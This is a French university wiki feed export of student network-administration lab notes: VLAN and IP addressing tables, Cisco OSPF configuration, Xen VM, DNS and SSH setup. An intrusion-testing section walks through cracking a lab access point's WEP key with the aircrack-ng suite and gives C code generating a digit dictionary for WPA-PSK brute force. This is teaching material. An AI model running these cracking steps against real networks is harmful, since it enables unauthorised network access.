Vous pouvez vous renseigner sur notre wiki.&amp;lt;br/&amp;gt;&lt;br /&gt;
Faites surtout très attention à ne pas effacer les modifications des autres groupes ainsi que les modifications communes déjà effectuées !&lt;br /&gt;
&lt;br /&gt;
'''Il n'y a rien à modifier sur les vlan 1, 131, 301, 314 et 333 !'''&amp;lt;br/&amp;gt;&lt;br /&gt;
'''Il n'y a rien à faire au niveau du rip'''&lt;br /&gt;
&lt;br /&gt;
Si vous avez le moindre doute, '''demandez-nous''' !&lt;br /&gt;
&lt;br /&gt;
Cordialement,&lt;br /&gt;
&lt;br /&gt;
Le groupe 14&lt;br /&gt;
&lt;br /&gt;
==Plan d'adressage==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (publique) !! IP (privée)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 314&lt;br /&gt;
| 193.48.57.176&lt;br /&gt;
| 100.64.0.16&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| truffe.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 312&lt;br /&gt;
| 193.48.57.177&lt;br /&gt;
| 100.64.0.17&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 311&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
| pleurote.site&lt;br /&gt;
|&lt;br /&gt;
| 310&lt;br /&gt;
| 193.48.57.179&lt;br /&gt;
| 100.64.0.19&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 309&lt;br /&gt;
| 193.48.57.180&lt;br /&gt;
| 100.64.0.20&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
| piedbleu.site&lt;br /&gt;
|&lt;br /&gt;
| 308&lt;br /&gt;
| 193.48.57.181&lt;br /&gt;
| 100.64.0.21&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 307&lt;br /&gt;
| 193.48.57.182&lt;br /&gt;
| 100.64.0.22&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| morillon.website&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 306&lt;br /&gt;
| 193.48.57.183&lt;br /&gt;
| 100.64.0.23&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| amanite.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 305&lt;br /&gt;
| 193.48.57.184&lt;br /&gt;
| 100.64.0.24&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 304&lt;br /&gt;
| 193.48.57.185&lt;br /&gt;
| 100.64.0.25&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| clavaire.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 303&lt;br /&gt;
| 193.48.57.186&lt;br /&gt;
| 100.64.0.26&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| ophiocordyceps.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 302&lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| 100.64.0.27&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6 !! N° VRRP&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 1&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| 10.60.100.1&lt;br /&gt;
| 10.60.100.2&lt;br /&gt;
| 10.60.100.254&lt;br /&gt;
| 2001:660:4401:60b0::0/64&lt;br /&gt;
| 31&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.8/29&lt;br /&gt;
| 192.168.222.12&lt;br /&gt;
| 192.168.222.13&lt;br /&gt;
| &lt;br /&gt;
| 2001:660:4401:60b1::0/64&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.0/24&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 2001:660:4401:60b2::0/64&lt;br /&gt;
| 33&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| 301&lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 10.60.101.1&lt;br /&gt;
| 10.60.101.2&lt;br /&gt;
| 10.60.101.254&lt;br /&gt;
| 2001:660:4401:60b3::0/64&lt;br /&gt;
| 41&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| &lt;br /&gt;
| 302&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 10.60.102.1&lt;br /&gt;
| 10.60.102.2&lt;br /&gt;
| 10.60.102.254&lt;br /&gt;
| 2001:660:4401:60b4::0/64&lt;br /&gt;
| 42&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| clavaire.site&lt;br /&gt;
| 303&lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 10.60.103.1&lt;br /&gt;
| 10.60.103.2&lt;br /&gt;
| 10.60.103.254&lt;br /&gt;
| 2001:660:4401:60b5::0/64&lt;br /&gt;
| 43&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| &lt;br /&gt;
| 304&lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 10.60.104.1&lt;br /&gt;
| 10.60.104.2&lt;br /&gt;
| 10.60.104.254&lt;br /&gt;
| 2001:660:4401:60b6::0/64&lt;br /&gt;
| 44&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| amanite.site&lt;br /&gt;
| 305&lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 10.60.105.1&lt;br /&gt;
| 10.60.105.2&lt;br /&gt;
| 10.60.105.254&lt;br /&gt;
| 2001:660:4401:60b7::0/64&lt;br /&gt;
| 45&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| morillon.website&lt;br /&gt;
| 306&lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 10.60.106.1&lt;br /&gt;
| 10.60.106.2&lt;br /&gt;
| 10.60.106.254&lt;br /&gt;
| 2001:660:4401:60b8::0/64&lt;br /&gt;
| 46&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
| &lt;br /&gt;
| 307&lt;br /&gt;
| 10.60.107.0/24&lt;br /&gt;
| 10.60.107.1&lt;br /&gt;
| 10.60.107.2&lt;br /&gt;
| 10.60.107.254&lt;br /&gt;
| 2001:660:4401:60b9::0/64&lt;br /&gt;
| 47&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
| &lt;br /&gt;
| 308&lt;br /&gt;
| 10.60.108.0/24&lt;br /&gt;
| 10.60.108.1&lt;br /&gt;
| 10.60.108.2&lt;br /&gt;
| 10.60.108.254&lt;br /&gt;
| 2001:660:4401:60ba::0/64&lt;br /&gt;
| 48&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
| &lt;br /&gt;
| 309&lt;br /&gt;
| 10.60.109.0/24&lt;br /&gt;
| 10.60.109.1&lt;br /&gt;
| 10.60.109.2&lt;br /&gt;
| 10.60.109.254&lt;br /&gt;
| 2001:660:4401:60bb::0/64&lt;br /&gt;
| 49&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
| pleurote.site&lt;br /&gt;
| 310&lt;br /&gt;
| 10.60.110.0/24&lt;br /&gt;
| 10.60.110.1&lt;br /&gt;
| 10.60.110.2&lt;br /&gt;
| 10.60.110.254&lt;br /&gt;
| 2001:660:4401:60bc::0/64&lt;br /&gt;
| 50&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
| 51&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| truffe.site&lt;br /&gt;
| 312&lt;br /&gt;
| 10.60.112.0/24&lt;br /&gt;
| 10.60.112.1&lt;br /&gt;
| 10.60.112.2&lt;br /&gt;
| 10.60.112.254&lt;br /&gt;
| 2001:660:4401:60be::0/64&lt;br /&gt;
| 52&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| 314&lt;br /&gt;
| 10.60.114.0/24&lt;br /&gt;
| 10.60.114.1&lt;br /&gt;
| 10.60.114.2&lt;br /&gt;
| 10.60.114.254&lt;br /&gt;
| 2001:660:4401:60bf::0/64&lt;br /&gt;
| 54&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation du réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Branchement du matériel ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]&lt;br /&gt;
&lt;br /&gt;
=== Connexions entre équipements ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te1/1/1&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/5&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| AAA&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/5&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.1/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Eth5&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/4&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.12/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 1G&lt;br /&gt;
| Te1/1/3&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.2/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Eth4&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| AAA&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Gi1/0/1&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.13/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| SDSL&lt;br /&gt;
| Cuivre&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage de l'OSPF ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
  router-id 10.60.100.2                                   # on change simplement l'id du routeur par rapport au 6509-E&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
  redistribute connected subnets                       &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53712</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53712"/>
				<updated>2020-11-16T14:48:28Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Routage du site IPv4 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
 			      6		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53711</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53711"/>
				<updated>2020-11-16T14:48:01Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* SSH */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
